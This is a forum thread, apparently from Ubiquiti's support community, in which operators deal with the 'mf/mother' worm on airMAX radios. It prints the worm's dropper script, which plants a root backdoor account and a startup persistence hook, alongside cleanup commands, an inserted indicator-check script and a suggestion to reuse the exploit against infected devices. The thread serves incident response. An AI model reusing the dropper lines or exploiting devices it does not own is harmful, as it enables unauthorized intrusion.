Ubiquiti Employee
Posts: 11,848
Registered: ‎11-27-2012
Kudos: 3796
Solutions: 778
Contributions: 73

Re: Virus attack - URGENT @UBNT


@ivanbon wrote:

Only some got 5.6.4; most got 5.5.10 because our reseller still ships us with that firmware.

And yes, we have 2-3 standard installation passwords, so they pretty surely got the same password.


I would upgrade any existing units to 5.6.4, verify no custom scripts are running and change the password. 5.5.10 would be exploitable.

Ubiquiti Networks airMAX Support Team

Check out our ever-evolving Help Center for answers to many common questions!

FREE UBWA Student Guide-Great RF Primer!

Member
Posts: 275
Registered: ‎03-14-2008
Kudos: 8

Re: Virus attack - URGENT @UBNT

Is 5.6.4 SAFE?

 

New Member
Posts: 8
Registered: ‎11-12-2011

Re: Virus attack - URGENT @UBNT

How do I verify that there are no custom scripts running on the device?

New Member
Posts: 13
Registered: ‎11-26-2012

Re: Virus attack - URGENT @UBNT

Hi all, we have a lot of CPEs hacked. I checked the scripts in /etc/persistent/

I found an "i" script:

XM.v5.6.4# cat i
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd /etc/persistent ; tar -xf mf.tar ; $per/.mf/mother" >> $per/rc.poststart
chmod +x $per/rc.poststart
rm $per/mother
rm $per/download
rm $per/f*u*c*k*e*r* (sorry but the forum don't allow to post this word)
rm $per/search
rm $per/curl
rm $per/lib*
cfgmtd -w -p /etc/

reboot -n -f >/dev/null &

The virus creates a new user called mother in /etc/passwd.

 

The best way to delete it all is:

cd /etc/persistent
rm -R mcuser
rm -R .mf
rm *
sed -n '/mother/!p' /etc/passwd > /etc/passwd.new
mv /etc/passwd.new /etc/passwd
cfgmtd -w -p /etc/
killall -9 search
killall -9 mother
killall -9 sleep
reboot

 

 
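To answer the question above about verifying that no custom scripts are running, and to check a radio for the traces the "i" dropper and the cleanup recipe above refer to, here is an added shell check; it is not code from the thread or from Ubiquiti. It assumes you can point it at the root of a device filesystem (a pulled copy, or "/" on the radio itself), and the sample filesystem it builds is constructed for demonstration.

```shell
#!/bin/sh
# Added example, not code from the thread or from Ubiquiti: an indicator check for the
# "mf"/"mother" persistence the dropper above installs. Pass the root of a copy of the
# device filesystem, or "/" to run it in the radio's own BusyBox shell.
# Prints each finding; returns 0 when nothing was found, 1 otherwise.
check_mf_indicators() {
    root="${1:-/}"
    per="$root/etc/persistent"
    found=0
    # 1. Backdoor account: the dropper appends a uid-0 user named "mother".
    if grep -q '^mother:' "$root/etc/passwd" 2>/dev/null; then
        echo "INDICATOR: user 'mother' present in /etc/passwd"; found=1
    fi
    # 2. Any other uid-0 account besides root (the same trick under another name).
    extra=$(awk -F: '$3 == 0 && $1 != "root" && $1 != "mother" {print $1}' "$root/etc/passwd" 2>/dev/null)
    if [ -n "$extra" ]; then
        echo "INDICATOR: extra uid-0 account(s): $extra"; found=1
    fi
    # 3. Persistence hook: a custom rc.poststart, in particular one that unpacks
    #    mf.tar and launches .mf/mother, as the dropper writes it.
    if [ -f "$per/rc.poststart" ]; then
        echo "INDICATOR: custom startup script $per/rc.poststart exists"; found=1
        if grep -qE 'mf\.tar|\.mf/mother' "$per/rc.poststart"; then
            echo "INDICATOR: rc.poststart references the mf payload"
        fi
    fi
    # 4. Files named in the dropper and in the cleanup recipe above.
    for f in i mf.tar .mf mcuser mother search download curl; do
        if [ -e "$per/$f" ]; then
            echo "INDICATOR: $per/$f present"; found=1
        fi
    done
    return $found
}

# Constructed sample filesystem that reproduces the indicators (demonstration only).
make_infected_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/persistent/.mf"
    printf 'root:x:0:0:root:/root:/bin/sh\nmother:x:0:0:Administrator:/etc/persistent:/bin/sh\n' > "$d/etc/passwd"
    printf 'cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother\n' > "$d/etc/persistent/rc.poststart"
    : > "$d/etc/persistent/mf.tar"
    echo "$d"
}

# On a radio you would run: check_mf_indicators /   -- here we check the sample.
sample=$(make_infected_sample)
if check_mf_indicators "$sample"; then echo "clean"; else echo "indicators found"; fi
rm -rf "$sample"
```

A clean radio produces no output and exit status 0, so the function can be looped over a list of CPEs from a management host.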

New Member
Posts: 1
Registered: ‎05-14-2016

Re: Virus attack - URGENT @UBNT

Many of our CPEs have been infected as well. A smart way to counter it is to use the same exploit and modify the virus scripts to clear itself while it spreads in the network. Does anyone have some time to put a stop to it!


Emerging Member
Posts: 86
Registered: ‎10-28-2010
Kudos: 44

Re: Virus attack - URGENT @UBNT

5.6.4 is being compromised as well. We are seeing it on our network. It makes it impossible to log in to the radio if it is still online. However, many of the radios have gone offline. Radios that have had the ports changed appear not to be compromised. I was able to download a custom script that had been installed, and it looks like it is an SSH key.

Member
Posts: 275
Registered: ‎03-14-2008
Kudos: 8

Re: Virus attack - URGENT @UBNT

Is UBNT doing anything, for Christ's sake?

 

Regular Member
Posts: 563
Registered: ‎12-20-2010
Kudos: 78
Solutions: 1

Re: Virus attack - URGENT @UBNT

We just deleted the virus from one CPE and upgraded it, and before it got upgraded the virus was back.

After the upgrade, the virus is still there.

Established Member
Posts: 1,420
Registered: ‎05-18-2011
Kudos: 516
Solutions: 110
Contributions: 2

Re: Virus attack - URGENT @UBNT


There's no improvement if you only kill the running processes of the exploit. The real fix is to stop the exploit's outbound traffic, remove the exploit, and run cfgmtd & reboot.

Ubiquiti Employee
Posts: 11,848
Registered: ‎11-27-2012
Kudos: 3796
Solutions: 778
Contributions: 73

Re: Virus attack - URGENT @UBNT


@wolfcreek wrote:

5.6.4 is being compromised as well. We are seeing it on our network. It makes it impossible to log in to the radio if it is still online. However, many of the radios have gone offline. Radios that have had the ports changed appear not to be compromised. I was able to download a custom script that had been installed, and it looks like it is an SSH key.


Could you send me any files/scripts you have recovered? james@ubnt.com

 

This mf variant does, in fact, use the exploit that was addressed in 5.6.2. Is it possible you have some radios on pre-5.6.2 firmware?

Ubiquiti Networks airMAX Support Team


New Member
Posts: 25
Registered: ‎05-03-2016
Kudos: 7

Re: Virus attack - URGENT @UBNT


Anyone who still has infected equipment on versions 5.6.4 and 5.6.3 can try the commands below:

 

grep -E "users|sshd.auth.key" /tmp/system.cfg; rm -fr /etc/persistent/rc.* /etc/persistent/profile; rm -rf /etc/persistent/rc.poststart; rm -rf /etc/persistent/mf.tar; cfgmtd -w -p /etc; reboot -f;

 

Access the device via SSH and check whether "rc.poststart" still exists; if it does, repeat the command. Log in via SSH as soon as possible and repeat the procedure. Here's the desired effect.

New Member
Posts: 13
Registered: ‎11-26-2012

Re: Virus attack - URGENT @UBNT

Hi James, I've just sent you an email.

New Member
Posts: 1
Registered: ‎04-28-2014

Re: Virus attack - URGENT @UBNT

Hello, I'm from RS (Rio Grande do Sul), can you get in touch via WhatsApp (51) 9990.2277

New Member
Posts: 7
Registered: ‎04-12-2014
Kudos: 7

Re: Virus attack - URGENT @UBNT

The MF script is working in steps with sleep timers.

Can someone please explain exactly what those steps mean for APs and STAs?

We read the source and saw one command, "poweroff". What happens after unplugging and replugging?

It could even change the SSID to Mother F-er. Does it really do that?

Please give as much advice for all scenarios as possible.

Thanks a lot!

Regular Member
Posts: 563
Registered: ‎12-20-2010
Kudos: 78
Solutions: 1

Re: Virus attack - URGENT @UBNT

Hi again.

 

After upgrading and cleaning it works again.

I suggest UBNT writes a bulk email to all the news subscribers and to their distributors that everyone MUST upgrade;

if not, they risk their entire network. Just a small suggestion which keeps customers happy.

 

Member
Posts: 230
Registered: ‎07-06-2012
Kudos: 68
Solutions: 5

Re: Virus attack - URGENT @UBNT

Can you give me a step-by-step account of what you did to clean the antennas? We can't seem to make anything work.

Regular Member
Posts: 513
Registered: ‎03-12-2013
Kudos: 62
Solutions: 10

Re: Virus attack - URGENT @UBNT


Can I turn SSH port 22 off so they cannot enter via SSH?

We run 5.6.4 on all devices, but can they do something about the version?

And what exactly does the virus do beyond changing the password?

 

/Flemming

Regular Member
Posts: 563
Registered: ‎12-20-2010
Kudos: 78
Solutions: 1

Re: Virus attack - URGENT @UBNT

Open PuTTY and connect to the antenna.

Step 1:

 

cd /etc/persistent

rm -R mcuser

rm -R .mf

rm *

sed -n '/mother/!p' /etc/passwd > /etc/passwd.new

mv /etc/passwd.new /etc/passwd

cfgmtd -w -p /etc/

killall -9 search

killall -9 mother

killall -9 sleep

reboot

 

Step 2:

XM firmware

 

cd /tmp/

wget http://dl.ubnt.com/firmwares/XN-fw/v5.6.4/XM.v5.6.4.28924.160331.1253.bin

mv XM.v5.6.4.28924.160331.1253.bin fwupdate.bin

ubntbox fwupdate.real -m /tmp/fwupdate.bin

 

XW firmware

 

cd /tmp/

wget http://dl.ubnt.com/firmwares/XW-fw/v5.6.4/XW.v5.6.4.28924.160331.1238.bin

mv XW.v5.6.4.28924.160331.1238.bin fwupdate.bin

ubntbox fwupdate.real -m /tmp/fwupdate.bin

 

If you don't have internet access from the device, you have an issue.

You then need to upload the firmware locally.

 

 

Deleted Account
Posts: 0

Re: Virus attack - URGENT @UBNT

Can I turn SSH port 22 off so they cannot enter via SSH?

/Flemming

 

Know that AirControl2 will not work if you turn off SSH.

It requires SSH port 22.

Established Member
Posts: 1,015
Registered: ‎10-24-2009
Kudos: 85
Solutions: 1

Re: Virus attack - URGENT @UBNT

Does AirControl 2 have a way to process tasks from the command line, as described in the older Skynet virus fix?

That would make it a lot easier to fix all these radios.

Yep, that can happen
www.wirelessdatanet.net